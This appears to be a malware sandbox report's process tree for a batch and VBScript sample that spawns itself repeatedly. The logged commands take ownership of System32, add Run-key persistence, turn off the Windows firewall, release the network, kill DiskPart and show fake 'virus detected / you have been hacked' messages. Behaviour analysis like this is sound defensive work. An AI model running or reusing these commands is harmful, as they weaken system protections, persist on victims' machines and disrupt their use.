C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\notepad.exenotepad2⤵
-
C:\Windows\system32\calc.execalc2⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"6⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\notepad.exenotepad2⤵
-
C:\Windows\system32\calc.execalc2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
